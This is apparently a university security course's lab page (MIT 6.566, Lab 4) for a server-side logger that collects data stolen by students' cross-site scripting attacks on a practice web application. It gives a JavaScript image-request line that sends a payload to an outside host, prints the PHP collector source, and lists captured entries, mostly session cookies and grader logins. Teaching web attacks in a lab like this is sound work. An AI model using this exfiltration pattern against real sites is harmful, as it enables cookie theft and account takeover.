You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.566/2024/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Mon, 03 Nov 2025 09:35:35 +0000: abc: grader/QFCOZBIQYRFL Mon, 03 Nov 2025 09:35:23 +0000: abc: grader/XTZYCMVCWROV Mon, 03 Nov 2025 09:35:17 +0000: abc: grader/JCKDALFNAPBR Mon, 03 Nov 2025 09:34:54 +0000: abc: PyZoobarLogin=grader#096a4d888bd4c5f07ec640b8d8c0deaeae8f683f9c3763371553881bebef5f9d Mon, 03 Nov 2025 09:34:48 +0000: abc: PyZoobarLogin=grader#17114a3d0aabcfeff1964a40a6136e7d726bfa2177342037cc9179a0f347a7dc Mon, 03 Nov 2025 09:34:35 +0000: abc: PyZoobarLogin=grader#173c376cec402946e09487db03ecff23c837b1df6897b31ecaf18ec9b7cbf3d9 Mon, 03 Nov 2025 09:33:07 +0000: abc: grader/XEUHHMSBMTNQ Mon, 03 Nov 2025 09:32:55 +0000: abc: grader/SAGMOODUYCNY Mon, 03 Nov 2025 09:32:23 +0000: abc: grader/UMLGXBLMZCHB Mon, 03 Nov 2025 09:32:00 +0000: abc: PyZoobarLogin=grader#7cc9807e9acc4ed5c1926801f690aabdb1931187e39da894334812c6c7a66107 Mon, 03 Nov 2025 09:31:53 +0000: abc: PyZoobarLogin=grader#c229677d03bd99941e59856c236ddbcb2997cc994c0393a478b3a7d4d35a8404 Mon, 03 Nov 2025 09:31:41 +0000: abc: PyZoobarLogin=grader#89c956eb07bf6f10ce1a832bcf41d5773e1ed504e26b9a959b229f84c8e0ec43 Mon, 03 Nov 2025 09:13:27 +0000: abc: PyZoobarLogin=q#6d8b1c994e48c11f55abb3be1b700c238f6ee32de7ad9aadb030ce45f644e2d4 Mon, 03 Nov 2025 08:06:02 +0000: q: w Mon, 03 Nov 2025 02:16:08 +0000: a: b Sat, 25 Oct 2025 00:06:05 +0000: dennis123: grader/DSKPYFTCGVLQ Sat, 25 Oct 2025 00:05:58 +0000: dennis123: grader/OYWRIGOBDYAL Sat, 25 Oct 2025 00:05:19 +0000: dennis123: PyZoobarLogin=grader#7aa8a46b60dcddca425323f04bbf33784d5e311e78c422faa9595ea50ca28bb1 Sat, 25 Oct 2025 00:05:07 +0000: dennis123: PyZoobarLogin=grader#20392cdd3567835e33fb2962e2396fea764116684592671a45f32e0fdb3dae67 Sat, 25 Oct 2025 00:04:52 +0000: dennis123: PyZoobarLogin=grader#7d59426b83c146f2de5c41acb971bd20c6ca6b62c0412756122f5f2d5c80ed4b Fri, 24 Oct 2025 23:54:28 +0000: dennis123: grader/WBZUKLLJLUUX Fri, 24 Oct 2025 23:54:20 +0000: dennis123: grader/YGOJYPGQHCFF Fri, 24 Oct 2025 23:53:52 +0000: dennis123: PyZoobarLogin=grader#ac57454d64d0cb69d914ec30106f3ccab563dd21a69348d7c69ea4f0c644bcda Fri, 24 Oct 2025 23:53:35 +0000: dennis123: PyZoobarLogin=grader#e2848f6044a2d8ed0dde0bcd8dccbca8314d458116481792f38d73a67f51081b Fri, 24 Oct 2025 23:41:13 +0000: dennis123: grader/TRYCKFHJWIEK Fri, 24 Oct 2025 23:41:05 +0000: dennis123: grader/ITHRQYZCSXII Fri, 24 Oct 2025 23:40:37 +0000: dennis123: PyZoobarLogin=grader#fef49db2bf71d56cd2515519361f764a081e65a8a3f407d92835a3cb8aeee027 Fri, 24 Oct 2025 23:40:20 +0000: dennis123: PyZoobarLogin=grader#7092fbe4a79331a122f8ffc38a97fe8c581ceac6ed9765c18bb58d363dcd8416 Fri, 24 Oct 2025 20:33:45 +0000: dennis123: grader/GGEKVKQTXLPT Tue, 21 Oct 2025 22:37:22 +0000: dennis123: grader/RVYXQGBSEVOW Tue, 21 Oct 2025 22:37:04 +0000: dennis123: grader/KZUSZJXIFRZM Tue, 21 Oct 2025 22:34:02 +0000: dennis123: Bob/bob Tue, 21 Oct 2025 22:33:43 +0000: dennis123: Bob/bob Tue, 21 Oct 2025 22:32:33 +0000: dennis123: grader/YHJRNLSIAFXF Tue, 21 Oct 2025 22:32:18 +0000: dennis123: grader/WQEYBVLASRVC Tue, 21 Oct 2025 22:27:03 +0000: dennis123: grader/OSSHOZUWTLCO Tue, 21 Oct 2025 22:24:35 +0000: dennis123: Bob/bob Tue, 21 Oct 2025 19:58:54 +0000: dennis123: PyZoobarLogin=grader#dff631ccb2ce801f90356e40b3a1b40ab98812a0d646231e58c883867ac5ca0f Tue, 21 Oct 2025 19:58:29 +0000: dennis123: PyZoobarLogin=grader#77887c0d5ee7896845802a8ce350dfdd9c87f62109548026c2945c67eaa86339 Tue, 21 Oct 2025 19:57:48 +0000: dennis123: PyZoobarLogin=grader#f12b5f16890c87c030415096702601215083839ec5b0f974d5a043e9cdacc424 Tue, 21 Oct 2025 19:52:19 +0000: dennis123: PyZoobarLogin=grader#bedac0e11ffa2d19ad6f4beeadf80122871a5d2a1a609b72586fbfde067f781e Tue, 21 Oct 2025 19:52:11 +0000: dennis123: PyZoobarLogin=grader#9ca877ec5bc7aec1be50bf8a60cb5a20d729b00ec6c439add6d5712b1de165c0 Tue, 21 Oct 2025 19:51:51 +0000: dennis123: PyZoobarLogin=grader#ec4d51bd09e9426d0e256efbcfb674cc4ef5fa2489094877157b881045fbed5a Thu, 16 Oct 2025 23:14:24 +0000: dennis123: PyZoobarLogin=grader#049d60e30411b232959faad53a112e571943bcb093aa5c726a32e34fb481af72 Thu, 16 Oct 2025 23:14:16 +0000: dennis123: PyZoobarLogin=grader#ace3e2d18d793e80364ceff1ae9c27408aeb434984c0d7b4534c0185ff0c163b Thu, 16 Oct 2025 23:13:58 +0000: dennis123: PyZoobarLogin=grader#5c3c321d4df6452be1631785823d742fdb3185827411591b587bb9b3a7b5eb5d Thu, 16 Oct 2025 23:08:30 +0000: dennis123: PyZoobarLogin=grader#e9782486fdbeb7354b507824cec81eca1c1697ba49b1ab4cb273fa6e7e102805 Thu, 16 Oct 2025 23:08:22 +0000: dennis123: PyZoobarLogin=grader#1689536ab04ef9d0b46b5f8cb007c6ec474ba7ca4bfd76d72845848322275d05 Thu, 16 Oct 2025 23:08:06 +0000: dennis123: PyZoobarLogin=grader#0e514197aa9bc57aad9b1b1e2f6ddc0fac9347bc22cef01cb1d1fd3abf1e7738 Thu, 16 Oct 2025 23:03:16 +0000: dennis123: PyZoobarLogin=grader#a8c96f3312eed359be538f592bc3949233f5e361dde2c89a46ea04b7aac467a2 Thu, 16 Oct 2025 23:03:08 +0000: dennis123: PyZoobarLogin=grader#8de5e4f63ddfa547c1a4e3297c55bd0d4918d85a4fa1dc31e3085abbfcf3bc71 Thu, 16 Oct 2025 23:02:51 +0000: dennis123: PyZoobarLogin=grader#e4d1179cd69e91adcebfd39bfc3b229606985549b15266edb054a69245ec5789 Thu, 16 Oct 2025 22:59:40 +0000: dennis123: PyZoobarLogin=grader#ab7bf72bd64063c7c81a79a0a4c24e0843e3fba34d6bfd7aced85b6480f2ae50 Thu, 16 Oct 2025 22:59:32 +0000: dennis123: PyZoobarLogin=grader#51696f98f5c0e6d95e7d09dd83e102d94a51653d4f486515bc5dfd41080c3d69 Thu, 16 Oct 2025 22:59:17 +0000: dennis123: PyZoobarLogin=grader#c5ea3992bd63c8f53d96da03f163579454a860fe795d9566b78ce8f9fde92ecd Thu, 16 Oct 2025 22:36:05 +0000: dennis123: PyZoobarLogin=grader#7d949418d06ad4fa6ea17687120e286fd3503ccda3630c5c5504333b39c7d7bf Thu, 16 Oct 2025 22:35:37 +0000: dennis123: PyZoobarLogin=grader#b3862f3d0a53b14a8b72e14912482889cbe5404cceb2b2e9f5edf16a1eb9431b Thu, 16 Oct 2025 22:34:40 +0000: dennis123: PyZoobarLogin=grader#3c4264e65264a61a0e29f43fad1e1845e6c2ccc94796e7039024348cd7046ec6 Thu, 16 Oct 2025 22:20:55 +0000: dennis123: PyZoobarLogin=Bob#83bc707070b5c41f77ab3ebd593d1a4df0434ef0dae7908082a48a1dc94fb820 Thu, 16 Oct 2025 22:20:33 +0000: dennis123: PyZoobarLogin=Bob#83bc707070b5c41f77ab3ebd593d1a4df0434ef0dae7908082a48a1dc94fb820 Thu, 16 Oct 2025 22:12:07 +0000: dennis123: PyZoobarLogin=Bob#83bc707070b5c41f77ab3ebd593d1a4df0434ef0dae7908082a48a1dc94fb820 Thu, 16 Oct 2025 22:03:55 +0000: dennis123: PyZoobarLogin=grader#31e73f07954fa710eac77a017f673020ab786264467e28cbdf3ada67e60b061c Thu, 16 Oct 2025 22:03:47 +0000: dennis123: PyZoobarLogin=grader#83d9ab9e91443a9ed423e4391550118e5a287d2c921319c806fcb91abcf5414b Thu, 16 Oct 2025 22:03:30 +0000: dennis123: PyZoobarLogin=grader#1d0ab35e3e5a57f1a4d8564aad5d53e2285cb3d1c02e2234103338da7cd37caf Thu, 16 Oct 2025 21:59:08 +0000: dennis123: PyZoobarLogin=grader#ffa2b305261c709b8a046308d771c0d572f70a0e3984a19bfb07f393a9e69783 Thu, 16 Oct 2025 21:59:00 +0000: dennis123: PyZoobarLogin=grader#75e1c5c2c87350b0f269260c63ae8bb701f93fadbaa6e1ad5d26b3a080c8b033 Thu, 16 Oct 2025 21:58:44 +0000: dennis123: PyZoobarLogin=grader#fd72503823a24b47b5da64d6eeb9cd815dd81fde3d358b722df47fa86bd00461 Thu, 16 Oct 2025 21:55:25 +0000: dennis123: PyZoobarLogin=grader#d8361e3870e370a4b10b69343bdcee9b2f5fcd91976d1654810ea65a05b0a41a Thu, 16 Oct 2025 21:55:14 +0000: dennis123: PyZoobarLogin=grader#66687c117ebe7a78f284fda088a0370e930de285e847ee5a09472f2d49232ba3 Thu, 16 Oct 2025 21:54:51 +0000: dennis123: PyZoobarLogin=grader#2fbca91fe39a12115a71e7f09874a01276775a14712e6b8e77c0dce747157588 Thu, 16 Oct 2025 21:52:46 +0000: dennis123: PyZoobarLogin=grader#12ec0d6f8e7ccccb629aa3a5952ff24ba492f99f80c612f979e5d5a6b730c476 Thu, 16 Oct 2025 21:52:38 +0000: dennis123: PyZoobarLogin=grader#9da73ab35d064904fd0344b77a6c7a251c8eba23051c7c133a9bfdeb4e3d629e Thu, 16 Oct 2025 21:52:22 +0000: dennis123: PyZoobarLogin=grader#337dc0e08f0c1d8bc32d0e13b695d6637308e77a8f472bb2f333c58ce7f22a80 Thu, 16 Oct 2025 21:50:09 +0000: dennis123: PyZoobarLogin=Bob#492b71fc4dfbb5af28cc640709ad7b13223f4214e866ea5e7b2d6013b24eefdb Thu, 16 Oct 2025 21:43:40 +0000: dennis123: PyZoobarLogin=Bob#492b71fc4dfbb5af28cc640709ad7b13223f4214e866ea5e7b2d6013b24eefdb Thu, 16 Oct 2025 21:39:35 +0000: dennis123: PyZoobarLogin=grader#dece7f0a149f6c509c28dfbe53025b5f2dd4db8a7c18cb2e77c0455c0db8efa2 Thu, 16 Oct 2025 21:39:27 +0000: dennis123: PyZoobarLogin=grader#3bf08fa1415a8d2caec8b092a89e52c52e50d40baca54d10c5dae4d7cae46707 Thu, 16 Oct 2025 21:39:10 +0000: dennis123: PyZoobarLogin=grader#c4b95962563744e64cacc93f4490fd67c700af91999041e5c3738e96ce005641 Thu, 16 Oct 2025 21:33:36 +0000: dennis123: PyZoobarLogin=grader#da54c5479579097d991d64c6e2021e61811df266bbedc5c79ccb7a27bddcab8e Thu, 16 Oct 2025 21:33:27 +0000: dennis123: PyZoobarLogin=grader#2447dabfa69df210d4e00fe222039d7404bffe849fb117afc511a26645c8d1b2 Thu, 16 Oct 2025 21:33:08 +0000: dennis123: PyZoobarLogin=grader#ef676f2c9c7aff1b2ba2226e3024fce87412202c26a98c60cda1063951bfbb3a Thu, 16 Oct 2025 21:31:05 +0000: dennis123: PyZoobarLogin=Bob#7a0da907e06d62cb72cd6260e498cc3082af8b44e516e244024dcf354eda4a0f Thu, 16 Oct 2025 21:08:57 +0000: dennis123: PyZoobarLogin=Bob#7a0da907e06d62cb72cd6260e498cc3082af8b44e516e244024dcf354eda4a0f Thu, 16 Oct 2025 21:04:26 +0000: dennis123: PyZoobarLogin=grader#ba586ff8581fe3757a60926350ce6d14bbd98a7c896f1283f0dfd76508a63d2c Thu, 16 Oct 2025 21:04:17 +0000: dennis123: PyZoobarLogin=grader#c0f2aaa02f6a07d75b6e79e5e5802247e7957a21bf14f7518540b188c50137ae Thu, 16 Oct 2025 21:04:01 +0000: dennis123: PyZoobarLogin=grader#b97159e7ee204367fb9c9e10aa239e0494eac7fadca7308a9c963027f0beeaba Thu, 16 Oct 2025 21:00:06 +0000: dennis123: PyZoobarLogin=Bob#cf8e625b4ce730e584c001154bec4b91b9359083bcf9ce89f9945e868f13629c Thu, 16 Oct 2025 19:41:01 +0000: dennis123: PyZoobarLogin=Bob#610dc7bad5fa830ca5715fd13b9f8dc5ecb88871e00399fb66d4c095e5ddaa24 Thu, 16 Oct 2025 19:39:01 +0000: dennis123: PyZoobarLogin=Bob#610dc7bad5fa830ca5715fd13b9f8dc5ecb88871e00399fb66d4c095e5ddaa24 Thu, 16 Oct 2025 19:34:13 +0000: dennis123: PyZoobarLogin=grader#bd2e8c7dca27f8a79b8c330585d2c5e81551c4b68c6f5d92f3f636cd96164e26 Thu, 16 Oct 2025 19:33:54 +0000: dennis123: PyZoobarLogin=grader#d9fb35ddb757aabe4dcee6ba6e33e3df5adb6e1594fce144927bdc9e3d5fa98e Wed, 15 Oct 2025 23:49:12 +0000: dennis123: PyZoobarLogin=grader#449dc4d1923a87c44bd88740ee4baaed12f0d4eb62fc9b94dddd8aae7a2a0ea6 Wed, 15 Oct 2025 23:48:35 +0000: dennis123: PyZoobarLogin=grader#2543c5813998d78167e67d5f49017b3f8edc3ad8955038e1a32f1917c2d03fd0 Wed, 15 Oct 2025 23:45:00 +0000: dennis123: PyZoobarLogin=grader#7e6b3a9747677e8814933333a0b05d4cba561fcad9f4149a381651a6676979f9 Wed, 15 Oct 2025 23:44:23 +0000: dennis123: PyZoobarLogin=grader#dda293893c65452458e75638df499b1cc7dcbad1fe0f598a57d31e85834f507f Wed, 15 Oct 2025 23:40:08 +0000: dennis123: PyZoobarLogin=grader#bac0f0b2cb489743a01157cc970347726322f01cf15caacb0e66f3eddfe6c3fe Wed, 15 Oct 2025 23:39:31 +0000: dennis123: PyZoobarLogin=grader#d076a2a5ec6e56a78d2c21f890bb9a76a997f23d9368759de027722e3127f43b Wed, 15 Oct 2025 23:36:38 +0000: dennis123: grader#54e9e2aebad3a4d735ab25e7c768a4cbeb86dbefaf9050a7a1e59de668f96db8 Wed, 15 Oct 2025 23:36:17 +0000: dennis123: grader#d5e77444ba7417cf2aacd4ae43fad5385e643f6a104a8bd7c042ae22a851ca60 Wed, 15 Oct 2025 23:33:26 +0000: dennis123: grader#eb7569f21bdfef14c7a94e9d52e7703a08cc771b31697b89aa1356bacfb0cd0f Wed, 15 Oct 2025 23:31:33 +0000: dennis123: grader#e86c52429c38bebf39c327f034d431198cae7a03df814d42e114db7b014bfc39
In case you are curious, here is the source code of this page.
<?php header("Access-Control-Allow-Origin: *"); do { if (!array_key_exists("id", $_REQUEST)) { break; } $id = $_REQUEST['id']; if (strlen($id) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "ID value is larger than 1000 bytes"; return; } if (!array_key_exists("payload", $_REQUEST)) { header("HTTP/1.0 400 Bad Request"); echo "No payload given"; return; } $payload = $_REQUEST['payload']; if (empty($payload)) { header("HTTP/1.0 400 Bad Request"); echo "Empty payload given"; return; } if (strlen($payload) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "Payload is larger than 1000 bytes"; return; } if (!function_exists('apcu_add')) { header("HTTP/1.0 501 Not Implemented"); echo "APCu not enabled, so no rate limiting; refusing all requests"; return; } if (apcu_add($payload, true, 5) === false) { // exact same $payload was sent in the past 5 seconds header("HTTP/1.0 429 Too Many Requests"); echo "That exact payload was sent very recently; rejecting"; return; } $payload = str_replace(array("\n", "\r"), '.', $payload); $id = str_replace(array("\n", "\r"), '.', $id); $file = fopen("/tmp/6.566-2024-logger.txt", "c+"); if ($file === false) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to open log file"; return; } if (!flock($file, LOCK_EX)) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to lock log file"; return; } $lines = array(); while (!feof($file) && count($lines) < 100) { $lines[] = fgets($file); } ftruncate($file, 0); rewind($file); fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n"); foreach ($lines as &$line) { fwrite($file, $line); } flock($file, LOCK_UN); fclose($file); echo "Logged!"; return; } while(0); $link = "(new Image()).src=" . "'https://css.csail.mit.edu/6.566/2024/labs/log.php?'" . " + 'id=my-username'" . " + '&payload=some-string' + '&random='" . " + Math.random()"; ?><!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="labs.css" /> <title>Lab 4 Logging Script</title> </head> <body> <h1>Lab 4 Logging Script</h1> <p> You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload: </p> <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre> <p> The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>. </p> <h2>Test form</h2> <p> If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.) </p> <form method="GET" action=""> <label for="id">ID:</label><br /> <input name="id" placeholder="your-mit-username" size="40" /> <i>(some identifier to locate your payload in the log)</i> <br /> <br /> <label for="payload">Payload:</label><br /> <input name="payload" placeholder="some-string" size="40" /> <i>(the information you stole)</i> <br /> <input type="submit" value="Log" name="log_submit" /> </form> <h2>Logged entries</h2> <p> Below are the most recent logged entries, so that you can check if your attack worked: </p> <pre class="tty"><?php $lines = file_get_contents("/tmp/6.566-2024-logger.txt"); echo htmlspecialchars($lines); ?></pre> <h2>Source code</h2> <p>In case you are curious, here is the source code of this page.</p> <pre><?php highlight_file(__FILE__); ?></pre> </body> </html>